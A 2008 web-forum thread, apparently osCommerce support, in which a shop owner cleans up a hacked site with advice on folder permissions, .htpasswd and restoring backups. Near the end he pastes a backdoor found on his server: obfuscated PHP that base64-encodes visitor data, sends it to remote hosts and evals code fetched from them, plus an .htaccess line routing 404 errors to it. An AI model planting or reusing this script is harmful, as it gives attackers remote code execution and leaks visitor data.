22 replies to this topic

[Forestshopkeeper]

My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read.
Thanks
Jim

[php_Guy]

Forestshopkeeper, on Oct 28 2008, 08:41 AM, said:

My site has been hacked twice in the past two weeks. I have had a good backup, but someone is changing my index file. Any suggestions on how to stop this? The permissions are set for user to read and write and for everyone else to read.
Thanks
Jim

Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built in password protection for admin. Use .htpasswd. You can set it up manually or through your cpanel.

Also be sure to install these mods

That should take care of the problem.

Edited by php_Guy, 28 October 2008, 16:18.

[germ]

Your images folder still has hack PHP files in it (looks to me like).

If it's set at 777 permissions, there's probably your weak point.

Folder permissions should not be higher than 755.

File permissions probably not higher than 644.

[php_Guy]

After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.

[Forestshopkeeper]

germ, on Oct 28 2008, 10:25 AM, said:

Your images folder still has hack PHP files in it (looks to me like).

If it's set at 777 permissions, there's probably your weak point.

Folder permissions should not be higher than 755.

File permissions probably not higher than 644.

Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referenceing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.
Jim

[Forestshopkeeper]

php_Guy, on Oct 28 2008, 10:17 AM, said:

Do you have any directories set at 777? Set them to 755. Files should be 644. Also, do not rely on the built in password protection for admin. Use .htpasswd. You can set it up manually or through your cpanel.

Also be sure to install these mods

That should take care of the problem.

Thanks. I am working on the mods. I set the folders at 755. files are 644
Jim

[Forestshopkeeper]

php_Guy, on Oct 28 2008, 10:38 AM, said:

After a hack like that, it's best to delete the entire site and reinstall from a known-good backup. Otherwise you will need to manually go through your site and look for new folders/files and check existing files for modifications. Re-installing a backup is much faster and easier.

Thanks for the info.
Jim

[Forestshopkeeper]

Forestshopkeeper, on Oct 28 2008, 04:20 PM, said:

Yes, it was at 777. I changed it to 755. I am not sure what "hack php files" you are referenceing. I did find one .php file and I removed it. I also got rid of the dummy images from the osC download.
Jim

Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777
Jim

[Forestshopkeeper]

Forestshopkeeper, on Oct 28 2008, 04:21 PM, said:

Thanks. I am working on the mods. I set the folders at 755. files are 644
Jim

Now when I try to upload images through the osC admin panel, I get an error saying the folder is not writable. Back to 777
Jim

[Forestshopkeeper]

Forestshopkeeper, on Oct 28 2008, 04:21 PM, said:

Thanks. I am working on the mods. I set the folders at 755. files are 644
Jim

is there any particular order to put in these mods? Do I need all of them? Are there any known conflicts between them?
Jim

[Vger]

If your images folder does not allow uploads unless set to 777 then do that but just for the upload and then reset to 755.

Either that or get your hosting company to sort out their security.

Vger

[Forestshopkeeper]

Vger, on Oct 28 2008, 05:23 PM, said:

If your images folder does not allow uploads unless set to 777 then do that but just for the upload and then reset to 755.

Either that or get your hosting company to sort out their security.

Vger

That makes sense for now till I can sort it out
Jim

[germ]

Recheck your images folder for hack PHP files:

 019667.php			  23-May-2008 22:30	 1k  
 1019667.php			 24-Aug-2008 01:55	 1k  
 19667.php			   20-Mar-2008 02:59	 1k

[php_Guy]

I generally find it easier to upload images via ftp and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755

Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php

Good luck

[Forestshopkeeper]

germ, on Oct 28 2008, 06:32 PM, said:

Recheck your images folder for hack PHP files:

 019667.php			  23-May-2008 22:30	 1k  
 1019667.php			 24-Aug-2008 01:55	 1k  
 19667.php			   20-Mar-2008 02:59	 1k

Thanks. I don't know where they came from, but they are gone now.
Jim

[germ]

They look like the same type of hacked that got me last March.

If so, It's not a destructive nor information stealing type of hack.

It's a "pay per click" scam.

They stick these bogus PHP files around, then seed search engines with links to them, then just set back and rake in the dough (so I've been told).

Personally, I think deleting everything and reinstalling at this point is a bit premature and going overboard.

Just be sure all the folder permission are no higher than 755 and keep an eye on things for a while.

If no more hack files show up, you should be OK.

By the way, better check your admin folder too, especially your backups folder for your database.

They got me there, too.

[Forestshopkeeper]

php_Guy, on Oct 28 2008, 07:05 PM, said:

I generally find it easier to upload images via ftp and add/change products via the easypopulate contribution. That way you can leave the images folder set to 755

Also, deleting the new .php files you find may not solve your problem. Once they got in, they may have edited files to enable another means of access. That's why I suggested deleting everything and restoring a backup. At the least check all your .htaccess files, .htpasswd files if you have any, and index.php

Good luck

I am looking at some .htaccess files in my admin folder:

This script is in a file called 220009.php

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($.".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>

This is what is in the .htaccess file in my backups folder

Options -MultiViews
ErrorDocument 404 //admin/backups/220009.php


In 2007 I did not even have a backups folder, and now I send everything to my computer. I am pulling these files for now and setting the permissions to 755 on these folders.

What else can I do?
Jim

[germ]

Both of the files you posted about in the backups folder are bad. Delete them.

[Forestshopkeeper]

germ, on Oct 28 2008, 08:48 PM, said:

Both of the files you posted about in the backups folder are bad. Delete them.

Thanks.
I think I have found everything now. The website is working with no threats identified. I hope to get started on the mods today.
Jim

[Forestshopkeeper]

Forestshopkeeper, on Oct 29 2008, 01:18 PM, said:

Thanks.
I think I have found everything now. The website is working with no threats identified. I hope to get started on the mods today.
Jim

Can you tell me what that particular script does? I can't make sense of it, but then, I am not a coder.
Jim